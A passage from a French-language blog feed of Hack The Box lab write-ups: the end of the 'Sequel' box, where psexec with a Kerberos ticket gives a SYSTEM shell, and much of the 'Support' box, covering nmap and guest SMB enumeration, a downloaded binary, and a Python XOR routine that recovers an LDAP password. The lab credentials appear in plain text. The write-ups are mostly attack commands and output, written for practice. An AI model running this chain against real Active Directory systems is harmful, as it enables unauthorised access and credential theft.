class="o">[</span>*<span class="o">]</span> Got <span class="nb">hash</span> <span class="k">for</span> <span class="s1">&#39;administrator@sequel.htb&#39;</span>: aad3b435b51404eeaad3b435b51404ee:a52f78e4c751e5f5e17e1e9f3e58f4ee </span></span></code></pre></td></tr></table> </div> </div><h3 id="gaining-administrator-shell-psexec">Gaining Administrator Shell (psexec) </h3><p>En utilisant le TGT et l&rsquo;outil psexec.py, on obtient un shell en tant que <code>nt authority\system</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ <span class="nb">export</span> <span class="nv">KRB5CCNAME</span><span class="o">=</span><span class="s2">&#34;administrator.ccache&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ psexec.py -k -no-pass sequel.htb/Administrator@dc.sequel.htb </span></span><span class="line"><span class="cl">Impacket v0.13.0.dev0+20250107.155526.3d734075 - Copyright Fortra, LLC and its affiliated companies </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Requesting shares on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Found writable share ADMIN$ </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Uploading file zjPAtFqg.exe </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Opening SVCManager on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Creating service cbfM on dc.sequel.htb..... </span></span><span class="line"><span class="cl"><span class="o">[</span>*<span class="o">]</span> Starting service cbfM..... </span></span><span class="line"><span class="cl"><span class="o">[</span>!<span class="o">]</span> Press <span class="nb">help</span> <span class="k">for</span> extra shell commands </span></span><span class="line"><span class="cl">Microsoft Windows <span class="o">[</span>Version 10.0.17763.2746<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="o">(</span>c<span class="o">)</span> <span class="m">2018</span> Microsoft Corporation. All rights reserved. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">C:<span class="se">\W</span>indows<span class="se">\s</span>ystem32&gt; <span class="nb">type</span> C:<span class="se">\U</span>sers<span class="se">\A</span>dministrator<span class="se">\D</span>esktop<span class="se">\r</span>oot.txt </span></span><span class="line"><span class="cl">1991.....91d7 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/support-htb/Sun, 07 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/support-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Support cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Support</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.174</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">ldap : nvEfEK16^1aM4<span class="nv">$e7AclUf8x$tRWxPWO1</span>%lmz </span></span><span class="line"><span class="cl">support : Ironside47pleasure40Watchful </span></span></code></pre></td></tr></table> </div> </div><h2 id="system-info">System Info </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.174 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">53/tcp open domain syn-ack ttl <span class="m">127</span> Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec syn-ack ttl <span class="m">127</span> Microsoft Windows Kerberos <span class="o">(</span>server time: 2025-09-07 16:43:36Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn syn-ack ttl <span class="m">127</span> Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: support.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">593/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">3268/tcp open ldap syn-ack ttl <span class="m">127</span> Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: support.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">5985/tcp open http syn-ack ttl <span class="m">127</span> Microsoft HTTPAPI httpd 2.0 <span class="o">(</span>SSDP/UPnP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Microsoft-HTTPAPI/2.0 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Not Found </span></span><span class="line"><span class="cl">9389/tcp open mc-nmf syn-ack ttl <span class="m">127</span> .NET Message Framing </span></span><span class="line"><span class="cl">49664/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49667/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49674/tcp open ncacn_http syn-ack ttl <span class="m">127</span> Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">49678/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span><span class="line"><span class="cl">49702/tcp open msrpc syn-ack ttl <span class="m">127</span> Microsoft Windows RPC </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="dumping-users-using-guest-account">Dumping Users using guest account </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:support.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> support.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --rid-brute <span class="p">|</span> cut -d<span class="s1">&#39;:&#39;</span> -f2 <span class="p">|</span> cut -d<span class="s1">&#39;\&#39;</span> -f2 <span class="p">|</span> grep TypeUser <span class="p">|</span> cut -d<span class="s1">&#39; &#39;</span> -f1 &gt; users.txt </span></span><span class="line"><span class="cl">Administrator </span></span><span class="line"><span class="cl">Guest </span></span><span class="line"><span class="cl">krbtgt </span></span><span class="line"><span class="cl">DC$ </span></span><span class="line"><span class="cl">ldap </span></span><span class="line"><span class="cl">support </span></span><span class="line"><span class="cl">smith.rosario </span></span><span class="line"><span class="cl">hernandez.stanley </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><h3 id="smb-share--support-tools">SMB Share : support-tools </h3><p>Grâce au compte <strong>guest</strong>, on obtient un accès sur le share smb <code>support-tools</code>, qui nous permet notamment de récupérer un fichier intéressant : <code>UserInfo.exe.zip</code></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> -M spider_plus </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:support.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> support.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Started module spidering_plus with the following options: </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> DOWNLOAD_FLAG: False </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> STATS_FLAG: True </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_FILTER: <span class="o">[</span><span class="s1">&#39;print$&#39;</span>, <span class="s1">&#39;ipc$&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> EXCLUDE_EXTS: <span class="o">[</span><span class="s1">&#39;ico&#39;</span>, <span class="s1">&#39;lnk&#39;</span><span class="o">]</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> MAX_FILE_SIZE: <span class="m">50</span> KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> OUTPUT_FOLDER: /root/.nxc/modules/nxc_spider_plus </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Enumerated shares </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC Share Permissions Remark </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC ----- ----------- ------ </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC ADMIN$ Remote Admin </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC C$ Default share </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC IPC$ READ Remote IPC </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC NETLOGON Logon server share </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC support-tools READ support staff tools </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC SYSVOL Logon server share </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> Saved share-file metadata to <span class="s2">&#34;/root/.nxc/modules/nxc_spider_plus/10.10.11.174.json&#34;</span>. </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Shares: <span class="m">6</span> <span class="o">(</span>ADMIN$, C$, IPC$, NETLOGON, support-tools, SYSVOL<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Readable Shares: <span class="m">2</span> <span class="o">(</span>IPC$, support-tools<span class="o">)</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> SMB Filtered Shares: <span class="m">1</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total folders found: <span class="m">0</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Total files found: <span class="m">7</span> </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size average: 13.96 MB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size min: 77.32 KB </span></span><span class="line"><span class="cl">SPIDER_PLUS 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> File size max: 45.87 MB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ cat /root/.nxc/modules/nxc_spider_plus/10.10.11.174.json </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;support-tools&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;7-ZipPortable_21.07.paf.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:19&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:19&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:19&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;2.75 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UserInfo.exe.zip&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:31&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:31&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:31&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;45.87 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UserInfo.exe.zip&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-07-20 19:01:07&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-07-20 19:01:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-07-20 19:01:07&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;271 KB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;WiresharkPortable64_3.6.5.paf.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:43&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:43&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:43&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;42.34 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;npp.8.4.1.portable.x64.zip&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:55&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:55&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:19:55&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;5.19 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;putty.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:06&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;1.21 MB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;windirstat1_1_2_setup.exe&#34;</span>: <span class="o">{</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;atime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:17&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;ctime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:17&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;mtime_epoch&#34;</span>: <span class="s2">&#34;2022-05-28 13:20:17&#34;</span>, </span></span><span class="line"><span class="cl"> <span class="s2">&#34;size&#34;</span>: <span class="s2">&#34;77.32 KB&#34;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="userinfoexezip--net-executable">UserInfo.exe.zip : .NET executable </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nxc smb 10.10.11.174 -u <span class="s1">&#39;guest&#39;</span> -p <span class="s1">&#39;&#39;</span> --get-file <span class="se">\\</span>UserInfo.exe.zip UserInfo.exe.zip --share support-tools </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Windows Server <span class="m">2022</span> Build <span class="m">20348</span> x64 <span class="o">(</span>name:DC<span class="o">)</span> <span class="o">(</span>domain:support.htb<span class="o">)</span> <span class="o">(</span>signing:True<span class="o">)</span> <span class="o">(</span>SMBv1:False<span class="o">)</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> support.htb<span class="se">\g</span>uest: </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>*<span class="o">]</span> Copying <span class="s2">&#34;\UserInfo.exe.zip&#34;</span> to <span class="s2">&#34;UserInfo.exe.zip&#34;</span> </span></span><span class="line"><span class="cl">SMB 10.10.11.174 <span class="m">445</span> DC <span class="o">[</span>+<span class="o">]</span> File <span class="s2">&#34;\UserInfo.exe.zip&#34;</span> was downloaded to <span class="s2">&#34;UserInfo.exe.zip&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>Ce zip contient un binaire cutom <strong>UserInfo.exe</strong>. En décompilant le binaire, on découvre une string ressemblant à un mot de passe chiffré ainsi qu&rsquo;une clé :</p> <ul> <li>&ldquo;0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E&rdquo;</li> <li>&ldquo;armando&rdquo;</li> </ul> <p>Une fonction <strong>getPassword</strong> semble déchiffrer cette string à l&rsquo;aide de la clé en effectuant une manipulation.</p> <p><img src="https://leopoldabgn.github.io/writeups/p/support-htb/image.png" width="1468" height="409" srcset="https://leopoldabgn.github.io/writeups/p/support-htb/image_hu_524637b0566fa3a3.png 480w, https://leopoldabgn.github.io/writeups/p/support-htb/image_hu_f9c590aeffa15cef.png 1024w" loading="lazy" alt="enc_password and protected key" class="gallery-image" data-flex-grow="358" data-flex-basis="861px" ></p> <p>Grâce à <strong>ChatGPT</strong>, j&rsquo;ai pu comprendre comment fonctionnait le code et il m&rsquo;a généré un code Python équivalent au code <strong>.NET</strong> ce qui m&rsquo;a permis de récupérer le mot de passe :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">base64</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">enc_password</span> <span class="o">=</span> <span class="s2">&#34;0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E&#34;</span> </span></span><span class="line"><span class="cl"><span class="n">key</span> <span class="o">=</span> <span class="sa">b</span><span class="s2">&#34;armando&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1"># Base64 decode</span> </span></span><span class="line"><span class="cl"><span class="n">enc_bytes</span> <span class="o">=</span> <span class="n">base64</span><span class="o">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">enc_password</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">dec_bytes</span> <span class="o">=</span> <span class="nb">bytearray</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">enc_bytes</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">k</span> <span class="o">=</span> <span class="n">key</span><span class="p">[</span><span class="n">i</span> <span class="o">%</span> <span class="nb">len</span><span class="p">(</span><span class="n">key</span><span class="p">)]</span> </span></span><span class="line"><span class="cl"> <span class="n">dec_bytes</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">b</span> <span class="o">^</span> <span class="n">k</span> <span class="o">^</span> <span class="mh">0xDF</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">password</span> <span class="o">=</span> <span class="n">dec_bytes</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s2">&#34;utf-8&#34;</span><span class="p">,</span> <span class="n">errors</span><span class="o">=</span><span class="s2">&#34;ignore&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nb">print</span><span class="p">(</span><span class="n">password</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div><p>En executant le python, on trouve le mot de passe :</p> <ul> <li>ldap : <code>nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz</code></li> </ul> <p>C&rsquo;est très intéressant car une autre méthode attendue était d&rsquo;executer le programme et d&rsquo;effectuer des requête <strong>ldap</strong> authentifiées avec le compte utilisateur &ldquo;ldap&rdquo;. Il suffisait de lancer <strong>wireshark</strong> et d&rsquo;analyser le trafic réseau afin de récupérer le mot de passe !</p> <p>Bien sûr, le jour de l&rsquo;OSCP il n&rsquo;y aura pas de 